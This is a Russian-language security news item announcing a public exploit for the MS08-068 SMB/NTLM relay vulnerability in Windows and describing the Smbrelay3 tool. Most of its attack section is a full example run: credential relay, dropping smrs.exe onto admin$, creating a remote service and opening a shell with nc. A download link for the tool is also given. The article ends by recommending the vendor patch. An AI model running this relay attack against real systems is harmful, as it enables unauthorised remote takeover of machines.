Опубликован полнофункциональный эксплоит к уязвимости MS08-068

Теги: уязвимость, эксплоит

В публичном доступе находится эксплоит к недавно исправленной уязвимости в протоколе SMB.

В публичном доступе находится полнофункциональный эксплоит к уязвимости в реализации протокола SMB в Microsoft Windows. Проблема заключается в том, что NTLM позволяет пользователям отвечать на входящие подключения от других хостов и удачно аутентифицироваться на системе без знания пароля. Таким образом, если пользователь подключается к удаленной системе с помощью NTLM, существует возможность компрометации системы пользователя.

Эта аутентификационная схема используется в большом количестве протоколов, например HTTP. Также, существует функционал, позволяющий браузеру (iexplore) или системе (explorer) по умолчанию отправлять аутентификационные данные серверу, если сервер требует аутентификацию.

Smbrelay3 – утилита, которая позволяет злоумышленнику произвести следующие типы атак:

  • HTTP –> SMB – соединение с браузером и передача данных на SMB хост
  • SMB -> SMB – соединение с SMB системой и передача данных на другой хост
  • IMAP -> SMB – соединение с почтовым IMAP клиентом и передача данных на другой хост
  • POP3 -> SMB – соединение с почтовым POP3 клиентом и передача данных на другой хост
  • SMTP -> SMB – соединение с почтовым SMTP клиентом и передача данных на другой хост

Если полученные утилитой учетные данные принадлежат администратору системы, Smbrelay3 автоматически создает удаленную консоль на уязвимой системе.

Пример атаки:

C:\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81

SmbRelay3 - SMB to SMB and HTTP to SMB replay attack
(c) 2007 - 2008 Andres Tarasco - atarasco@gmail.com
Website: http://www.tarasco.org

Listening HTTP thread at port 81
Accepted Connection - Replaying against 192.168.1.2
Read First HTTP Request...
Sending Default HTTP 401 Error response and asking for authentiation NTLM
Read Second HTTP Request with Auhorization Header..
Init HTTP to SMB attack - Connecting with: 192.168.1.2:445
Sending SMB Authentication Handshake
Received SMB Message with NTLM v2 packet
Sending NTLM Challenge from SMB Server to the HTTP Client
Received Final Authentication packet from remote HTTP Client
UserName: Administrator
DomainName: 192.168.1.36
WorkstationName: SERVIDOR
Trying to authenticate to remote SMB as Administrator
Sending Final SMB Authentication packet with NTLM Message type 3
SessionSetupAndX Completed
Authenticacion against 192.168.1.2 Succeed with username Administrator
Connecting against IPC$
Trying to connect to admin$
Creating Remote File smrs.exe under admin$
Writing File smrs.exe into admin$
Closing File handle - FID: 800f
Opening Remote Service Control Manager pipe \svcctl
Sending RPC BindRequest to SCM pipe
Reading Response from Binding Request
Opening Remote Service Control Manager
Creating Remote Service
Opening Remote Service
Starting Remote Service...
Now Remote Service is executed... Try to connect to 192.168.1.2:8080

C:\smbrelay3>nc 192.168.1.2 8080
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

Smbrelay3 можно скачать по адресу: http://www.securitylab.ru/poc/363118.php

В настоящий момент в публичном доступе находятся следующие эксплоиты к уязвимости MS08-068:

Для удачной эксплуатации уязвимости целевой пользователь должен подключиться к злонамеренному серверу.

SecurityLab рекомендует всем пользователям установить исправление с сайта производителя.

Telegram Подписывайтесь на канал "SecurityLab" в Telegram, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.

comments powered by Disqus